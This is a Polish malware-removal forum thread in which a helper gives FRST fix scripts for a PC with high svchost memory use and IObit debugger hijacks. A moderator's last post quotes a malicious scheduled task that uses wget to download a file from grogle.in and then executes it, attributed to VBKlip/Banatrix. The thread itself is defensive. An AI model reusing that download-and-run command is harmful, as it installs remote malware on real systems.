kagar1989 Opublikowano 16 Maja 2015 Zgłoś Udostępnij Opublikowano 16 Maja 2015 Witam.Mam taki problem z svchost.exe zdarza się, że potrafi używać nawet do 1,5 gb Pamięci ram. FRST.txt Addition.txt Shortcut.txt GMER.txt Odnośnik do komentarza
Zappa Opublikowano 21 Maja 2015 Zgłoś Udostępnij Opublikowano 21 Maja 2015 1. Otwórz notatnik i wklej CloseProcesses: IFEO\ALLFixAVI.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ALLPlayer.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ALLPlayerRemoteControl.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ALLSkinCreator.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ALLSubSearcher.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ALLUpdate.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMACNF.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMINST.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMLNCR.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMMAIN.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMSWCS.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMULNC.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNQMUPDT.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\CNSEMAIN.EXE: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\DivXMux.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\GameOverlayUI.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\igoproxy64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ijplmsvc.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\ijplmui.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\mbam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\mbamdor.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\mbampt.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\mbamscheduler.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\mbamservice.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\Napisy24.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\Napisy24Update.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvSCPAPISvr.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\NvStereoUtilityOGL.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvStInst.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvstlink.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvstreg.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvsttest.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\nvstview.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\NVStWiz.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\OriginCrashReporter.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\OriginER.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\piso.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\PowerISO.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\PWRISOVM.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\setup64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\softinfo.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\Steam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\steamerrorreporter.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\steamerrorreporter64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\streaming_client.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\SysSettings32.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\SysSettings64.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\UpdateTool.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\WriteMiniDump.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe IFEO\WTFast.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare 8\AutoReactivator.exe Startup: C:\Users\Timi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windefonder.vbs [2015-04-17] () Startup: C:\Users\Timi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows.vbs [2015-04-17] () S3 VGPU; System32\drivers\rdvgkmd.sys [X] Task: {08B4F160-4306-48E7-95CB-F0075E44B0F0} - \RegClean Pro No Task File <==== ATTENTION Task: {346D3A46-0D46-460A-9A96-E143D5054669} - System32\Tasks\Update\cryptex => C:\Users\Timi\AppData\Local\Temp\ariana.exe <==== ATTENTION EmptyTemp: Plik zapisz jako fixlist.txt i umieść w C:\Users\Timi\Downloads. Uruchom FRST i kliknij w Fix. Przedstaw raort fixlog.txt. 2. Odinstaluj z panelu programów: Advanced SystemCare 8 IObit Malware Fighter wersja 3.0.2 IObit Uninstaller 3. Wykonaj nowy skan FRST - opcji Addition i Shortcut nie zaznaczaj. Odnośnik do komentarza
kagar1989 Opublikowano 21 Maja 2015 Autor Zgłoś Udostępnij Opublikowano 21 Maja 2015 Advanced SystemCare 8 jest mało przydatną aplikacja ?? Fixlog.txt FRST.txt Odnośnik do komentarza
Zappa Opublikowano 21 Maja 2015 Zgłoś Udostępnij Opublikowano 21 Maja 2015 Advanced SystemCare 8 jest mało przydatną aplikacja ?? Tak. Masz ja odinstalować. Omijaj z daleka wszystko co ma w nagłówku Iobit. Jak wygląda sprawa z procesem svchost i zuzyciem pamięci? Reszta instrukcji wieczorem. Odnośnik do komentarza
kagar1989 Opublikowano 21 Maja 2015 Autor Zgłoś Udostępnij Opublikowano 21 Maja 2015 obecne zużycie przez svchost 154 mb. Odnośnik do komentarza
Zappa Opublikowano 21 Maja 2015 Zgłoś Udostępnij Opublikowano 21 Maja 2015 Wynik mówi sam za siebie. A usuwalismy debugera od Advanced System Care. Dlatego odinstaluj tego śmiecia i czekaj na dalsze instrukcje. Odnośnik do komentarza
Zappa Opublikowano 25 Maja 2015 Zgłoś Udostępnij Opublikowano 25 Maja 2015 Otwórz notatnik i wklej S2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.EXE [X]S4 FileMonitor; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [X]S3 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]S3 UrlFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [X]C:\found.000C:\Users\Timi\AppData\Roaming\windefonder.vbsReboot: plik zapisz jako fixlist.txt i umieśc w C:\Users\Timi\Downloads. Uruchom FRST i kliknij w Fix. Przedstaw raort fixlog.txt. 2. Opisz jak zachowuje się system? Odnośnik do komentarza
kagar1989 Opublikowano 25 Maja 2015 Autor Zgłoś Udostępnij Opublikowano 25 Maja 2015 po restarcie systemu svchost.exe zużywał 360 mb po kilku minutach spadło do 150 był też 2 taki proces który zużywał 160 obecnie 20 a łącznie mam 15 takich procesów czy tyle ma ich być ? Fixlog.txt Odnośnik do komentarza
Zappa Opublikowano 25 Maja 2015 Zgłoś Udostępnij Opublikowano 25 Maja 2015 po restarcie systemu svchost.exe zużywał 360 mb po kilku minutach spadło do 150 był też 2 taki proces który zużywał 160 obecnie 20 a łącznie mam 15 takich procesów czy tyle ma ich być ? Liczba svchost.exe jest rózna i zależy od tego jak wygląda konfiguracja systemu, jakie programy są instalowane. U mnie leci 12 procesów z takim oznaczeniem. Ponieważ zuzycie ramu spadło (skutek infekcji) zastosuj czynności końcowe: Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Odnośnik do komentarza
kagar1989 Opublikowano 28 Maja 2015 Autor Zgłoś Udostępnij Opublikowano 28 Maja 2015 Witam, jednak nie pomogło zaczęło skakać między 754 mb a 1,1 gb po jakimś czasie spadło do 140 mb DelFix.txt Odnośnik do komentarza
Zappa Opublikowano 29 Maja 2015 Zgłoś Udostępnij Opublikowano 29 Maja 2015 Temat do zamknięcia - przynajmniej z mojej strony. Odnośnik do komentarza
picasso Opublikowano 21 Grudnia 2015 Zgłoś Udostępnij Opublikowano 21 Grudnia 2015 (edytowane) W systemie była aktywna infekcja w Harmonogramie zadań, pominięta w pierwotnych instrukcjach. Konkretnie BitCoinMiner (wpis MdmUpdateTaskMachineCore) oraz VBKlip/Banatrix (logger): Task: {5E3A314B-DAC0-417E-9379-C49049DA4729} - System32\Tasks\MdmUpdateTaskMachineCore => C:\Users\Timi\AppData\Roaming\uTorrent\Caches\mdm [2015-05-10] ( ) Task: {B3CB3E0B-E2CB-407C-AFDB-17C76C4DD8E7} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=VrNyEGncEc;ALLPlayer_Premium_5.6.2_Setup.exe;1426426470 & start cmd /R dat.bmp Upłynęło dużo czasu. Jeśli nadal problem aktualny, dostarcz świeże raporty FRST, wliczając Addition. Edytowane 2 Czerwca 2016 przez picasso Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso Odnośnik do komentarza
Rekomendowane odpowiedzi